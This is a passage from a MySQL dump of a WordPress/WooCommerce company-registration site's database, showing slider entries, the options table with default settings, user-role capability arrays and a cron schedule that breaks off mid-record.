18:48:04',1,0,'[]','','$/uploads/2016/03/Front-page-Biz-Tools.png','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"$\\/uploads\\/2016\\/03\\/Front-page-Biz-Tools.png\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"\",\"backgroundMode\":\"default\",\"link\":\"http:\\/\\/companyregistration.online\\/product-category\\/business-tools\\/|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',5,0),(6,'Front page maintaining Final',2,'2016-03-11 18:48:04','2026-03-12 18:48:04',1,0,'[]','','$/uploads/2016/03/Front-page-maintaining-Final.png','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"$\\/uploads\\/2016\\/03\\/Front-page-maintaining-Final.png\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"\",\"backgroundMode\":\"default\",\"link\":\"http:\\/\\/companyregistration.online\\/product-category\\/maintaning-your-company\\/|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',3,0),(7,'Front page New registration front page',2,'2016-03-11 18:48:04','2026-03-12 18:48:04',1,0,'[]','','$/uploads/2016/03/Front-page-New-registration-front-page.png','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"$\\/uploads\\/2016\\/03\\/Front-page-New-registration-front-page.png\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"\",\"backgroundMode\":\"default\",\"link\":\"http:\\/\\/companyregistration.online\\/product-category\\/company-registration\\/|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',1,0),(8,'Front page tax registration',2,'2016-03-11 18:48:04','2026-03-12 18:48:04',1,0,'[]','','$/uploads/2016/03/Front-page-tax-registration.png','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"$\\/uploads\\/2016\\/03\\/Front-page-tax-registration.png\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"\",\"backgroundMode\":\"default\",\"link\":\"http:\\/\\/companyregistration.online\\/product-category\\/tax-registration\\/|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',2,0),(9,'Welcome',2,'2016-03-11 18:48:04','2026-03-12 18:48:04',1,1,'[]','Take control of all your business legislative requirements','$/uploads/2016/03/Front-page-Welcome-rmb-1-White-business-sorted.png','{\"generator_id\":\"0\",\"first\":\"1\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"$\\/uploads\\/2016\\/03\\/Front-page-Welcome-rmb-1-White-business-sorted.png\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"Welcome\",\"backgroundMode\":\"fill\",\"link\":\"|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',0,0);
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_options`
--

DROP TABLE IF EXISTS `wpxb_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=MyISAM AUTO_INCREMENT=456411 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_options`
--

LOCK TABLES `wpxb_options` WRITE;
/*!40000 ALTER TABLE `wpxb_options` DISABLE KEYS */;
INSERT INTO `wpxb_options` VALUES (1,'siteurl','https://companyregistration.online','yes'),(2,'blogname','companyregistration.online','yes'),(3,'blogdescription','professional, simple and convenient','yes'),(4,'users_can_register','0','yes'),(5,'admin_email','info@companyregistration.online','yes'),(6,'start_of_week','1','yes'),(7,'use_balanceTags','','yes'),(8,'use_smilies','1','yes'),(9,'require_name_email','1','yes'),(10,'comments_notify','1','yes'),(11,'posts_per_rss','10','yes'),(12,'rss_use_excerpt','0','yes'),(13,'mailserver_url','mail.example.com','yes'),(14,'mailserver_login','login@example.com','yes'),(15,'mailserver_pass','password','yes'),(16,'mailserver_port','110','yes'),(17,'default_category','39','yes'),(18,'default_comment_status','open','yes'),(19,'default_ping_status','open','yes'),(20,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','jS F Y','yes'),(24,'time_format','H:i','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(29,'comment_moderation','','yes'),(30,'moderation_notify','1','yes'),(31,'permalink_structure','/%postname%/','yes'),(33,'hack_file','0','yes'),(34,'blog_charset','UTF-8','yes'),(35,'moderation_keys','','no'),(37,'home','https://companyregistration.online','yes'),(38,'category_base','','yes'),(39,'ping_sites','http://rpc.pingomatic.com/','yes'),(41,'comment_max_links','2','yes'),(42,'gmt_offset','2','yes'),(43,'default_email_category','1','yes'),(44,'recently_edited','a:5:{i:0;s:84:\"/home/digit626/companyregistration.online/wp-content/themes/ChildThemeDivi/style.css\";i:1;s:88:\"/home/digit626/companyregistration.online/wp-content/themes/ChildThemeDivi/functions.php\";i:3;s:80:\"/home/digit626/companyregistration.online/wp-content/plugins/akismet/akismet.php\";i:4;s:108:\"/home/digit626/companyregistration.online/wp-content/plugins/woocommerce-gateway-payfast/gateway-payfast.php\";i:5;s:90:\"/home/digit626/companyregistration.online/wp-content/plugins/divi-builder/divi-builder.php\";}','no'),(47,'comment_whitelist','1','yes'),(48,'blacklist_keys','','no'),(49,'comment_registration','1','yes'),(51,'html_type','text/html','yes'),(52,'use_trackback','0','yes'),(53,'default_role','customer','yes'),(54,'db_version','44719','yes'),(55,'uploads_use_yearmonth_folders','1','yes'),(56,'upload_path','/home/digit626/companyregistration.online/wp-content/uploads','yes'),(57,'blog_public','1','yes'),(58,'default_link_category','2','yes'),(59,'show_on_front','page','yes'),(60,'tag_base','','yes'),(61,'show_avatars','1','yes'),(62,'avatar_rating','G','yes'),(63,'upload_url_path','','yes'),(64,'thumbnail_size_w','150','yes'),(65,'thumbnail_size_h','150','yes'),(66,'thumbnail_crop','1','yes'),(67,'medium_size_w','300','yes'),(68,'medium_size_h','300','yes'),(69,'avatar_default','mystery','yes'),(72,'large_size_w','1024','yes'),(73,'large_size_h','1024','yes'),(74,'image_default_link_type','file','yes'),(75,'image_default_size','','yes'),(76,'image_default_align','','yes'),(77,'close_comments_for_old_posts','','yes'),(78,'close_comments_days_old','14','yes'),(79,'thread_comments','1','yes'),(80,'thread_comments_depth','5','yes'),(81,'page_comments','','yes'),(82,'comments_per_page','50','yes'),(83,'default_comments_page','newest','yes'),(84,'comment_order','asc','yes'),(85,'sticky_posts','a:0:{}','yes'),(86,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(87,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(88,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(89,'timezone_string','','yes'),(91,'embed_size_w','','yes'),(92,'embed_size_h','600','yes'),(93,'page_for_posts','0','yes'),(94,'page_on_front','4','yes'),(95,'wpxb_user_roles','a:13:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:169:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:7:\"nextend\";b:1;s:14:\"nextend_config\";b:1;s:19:\"nextend_visual_edit\";b:1;s:21:\"nextend_visual_delete\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:9:\"buwd_edit\";b:1;s:8:\"buwd_job\";b:1;s:13:\"buwd_job_edit\";b:1;s:15:\"buwd_job_delete\";b:1;s:12:\"buwd_job_run\";b:1;s:13:\"buwd_api_keys\";b:1;s:13:\"buwd_settings\";b:1;s:20:\"buwd_settings_import\";b:1;s:20:\"buwd_settings_export\";b:1;s:9:\"buwd_logs\";b:1;s:13:\"buwd_log_view\";b:1;s:15:\"buwd_log_delete\";b:1;s:17:\"buwd_log_download\";b:1;s:12:\"buwd_backups\";b:1;s:19:\"buwd_backups_delete\";b:1;s:21:\"buwd_backups_download\";b:1;s:8:\"backwpup\";b:1;s:13:\"backwpup_jobs\";b:1;s:18:\"backwpup_jobs_edit\";b:1;s:19:\"backwpup_jobs_start\";b:1;s:16:\"backwpup_backups\";b:1;s:25:\"backwpup_backups_download\";b:1;s:23:\"backwpup_backups_delete\";b:1;s:13:\"backwpup_logs\";b:1;s:20:\"backwpup_logs_delete\";b:1;s:17:\"backwpup_settings\";b:1;s:16:\"backwpup_restore\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:42:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:7:\"nextend\";b:1;s:14:\"nextend_config\";b:1;s:19:\"nextend_visual_edit\";b:1;s:21:\"nextend_visual_delete\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:8:\"customer\";a:2:{s:4:\"name\";s:8:\"Customer\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:12:\"shop_manager\";a:2:{s:4:\"name\";s:12:\"Shop Manager\";s:12:\"capabilities\";a:108:{s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:17:\"edit_others_pages\";b:1;s:13:\"publish_posts\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_posts\";b:1;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:19:\"delete_others_pages\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:10:\"list_users\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;}}s:10:\"buwd_admin\";a:2:{s:4:\"name\";s:15:\"Backup WD Admin\";s:12:\"capabilities\";a:17:{s:4:\"read\";b:1;s:9:\"buwd_edit\";b:1;s:8:\"buwd_job\";b:1;s:13:\"buwd_job_edit\";b:1;s:15:\"buwd_job_delete\";b:1;s:12:\"buwd_job_run\";b:1;s:13:\"buwd_api_keys\";b:1;s:9:\"buwd_logs\";b:1;s:13:\"buwd_settings\";b:1;s:20:\"buwd_settings_import\";b:1;s:20:\"buwd_settings_export\";b:1;s:13:\"buwd_log_view\";b:1;s:15:\"buwd_log_delete\";b:1;s:17:\"buwd_log_download\";b:1;s:12:\"buwd_backups\";b:1;s:19:\"buwd_backups_delete\";b:1;s:21:\"buwd_backups_download\";b:1;}}s:11:\"buwd_helper\";a:2:{s:4:\"name\";s:16:\"Backup WD Helper\";s:12:\"capabilities\";a:17:{s:4:\"read\";b:1;s:9:\"buwd_edit\";b:1;s:8:\"buwd_job\";b:1;s:13:\"buwd_job_edit\";b:0;s:15:\"buwd_job_delete\";b:0;s:12:\"buwd_job_run\";b:1;s:13:\"buwd_api_keys\";b:0;s:13:\"buwd_settings\";b:0;s:20:\"buwd_settings_import\";b:0;s:20:\"buwd_settings_export\";b:0;s:9:\"buwd_logs\";b:1;s:13:\"buwd_log_view\";b:1;s:15:\"buwd_log_delete\";b:0;s:17:\"buwd_log_download\";b:1;s:12:\"buwd_backups\";b:1;s:19:\"buwd_backups_delete\";b:0;s:21:\"buwd_backups_download\";b:1;}}s:12:\"buwd_checker\";a:2:{s:4:\"name\";s:17:\"Backup WD Checker\";s:12:\"capabilities\";a:17:{s:4:\"read\";b:1;s:9:\"buwd_edit\";b:1;s:8:\"buwd_job\";b:1;s:13:\"buwd_job_edit\";b:0;s:15:\"buwd_job_delete\";b:0;s:12:\"buwd_job_run\";b:0;s:13:\"buwd_api_keys\";b:0;s:13:\"buwd_settings\";b:0;s:20:\"buwd_settings_import\";b:0;s:20:\"buwd_settings_export\";b:0;s:9:\"buwd_logs\";b:1;s:13:\"buwd_log_view\";b:1;s:15:\"buwd_log_delete\";b:0;s:17:\"buwd_log_download\";b:0;s:12:\"buwd_backups\";b:1;s:19:\"buwd_backups_delete\";b:0;s:21:\"buwd_backups_download\";b:0;}}s:14:\"backwpup_admin\";a:2:{s:4:\"name\";s:14:\"BackWPup Admin\";s:12:\"capabilities\";a:11:{s:4:\"read\";b:1;s:8:\"backwpup\";b:1;s:13:\"backwpup_jobs\";b:1;s:18:\"backwpup_jobs_edit\";b:1;s:19:\"backwpup_jobs_start\";b:1;s:16:\"backwpup_backups\";b:1;s:25:\"backwpup_backups_download\";b:1;s:23:\"backwpup_backups_delete\";b:1;s:13:\"backwpup_logs\";b:1;s:20:\"backwpup_logs_delete\";b:1;s:17:\"backwpup_settings\";b:1;}}s:14:\"backwpup_check\";a:2:{s:4:\"name\";s:21:\"BackWPup jobs checker\";s:12:\"capabilities\";a:11:{s:4:\"read\";b:1;s:8:\"backwpup\";b:1;s:13:\"backwpup_jobs\";b:1;s:18:\"backwpup_jobs_edit\";b:0;s:19:\"backwpup_jobs_start\";b:0;s:16:\"backwpup_backups\";b:1;s:25:\"backwpup_backups_download\";b:0;s:23:\"backwpup_backups_delete\";b:0;s:13:\"backwpup_logs\";b:1;s:20:\"backwpup_logs_delete\";b:0;s:17:\"backwpup_settings\";b:0;}}s:15:\"backwpup_helper\";a:2:{s:4:\"name\";s:20:\"BackWPup jobs helper\";s:12:\"capabilities\";a:11:{s:4:\"read\";b:1;s:8:\"backwpup\";b:1;s:13:\"backwpup_jobs\";b:1;s:18:\"backwpup_jobs_edit\";b:0;s:19:\"backwpup_jobs_start\";b:1;s:16:\"backwpup_backups\";b:1;s:25:\"backwpup_backups_download\";b:1;s:23:\"backwpup_backups_delete\";b:1;s:13:\"backwpup_logs\";b:1;s:20:\"backwpup_logs_delete\";b:1;s:17:\"backwpup_settings\";b:0;}}}','yes'),(96,'widget_search','a:2:{s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(97,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'sidebars_widgets','a:9:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:8:\"search-4\";}s:9:\"sidebar-1\";a:4:{i:0;s:25:\"woocommerce_widget_cart-2\";i:1;s:28:\"woocommerce_product_search-2\";i:2;s:38:\"woocommerce_recently_viewed_products-2\";i:3;s:32:\"woocommerce_top_rated_products-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:9:\"sidebar-6\";a:0:{}s:9:\"sidebar-7\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(102,'ftp_credentials','a:3:{s:8:\"hostname\";s:9:\"localhost\";s:8:\"username\";N;s:15:\"connection_type\";s:3:\"ftp\";}','yes'),(103,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_links','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'cron','a:47:{i:1567062056;a:1:{s:33:\"wc_admin_process_orders_milestone\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567062294;a:1:{s:35:\"wcct_clear_goaldeal_stock_meta_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567062347;a:1:{s:29:\"wcj_download_tcpdf_fonts_hook\";a:1:{s:32:\"26b69dc9b9c77e4c1647111635ada6f2\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:1:{i:0;s:6:\"hourly\";}s:8:\"interval\";i:3600;}}}i:1567062609;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1567062633;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1567063297;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567063774;a:1:{s:29:\"wp_session_garbage_collection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567063941;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1567064578;a:1:{s:22:\"backwpup_check_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1567064579;a:1:{s:23:\"backwpup_update_message\";a:1:{s:32:\"40cd750bba9870f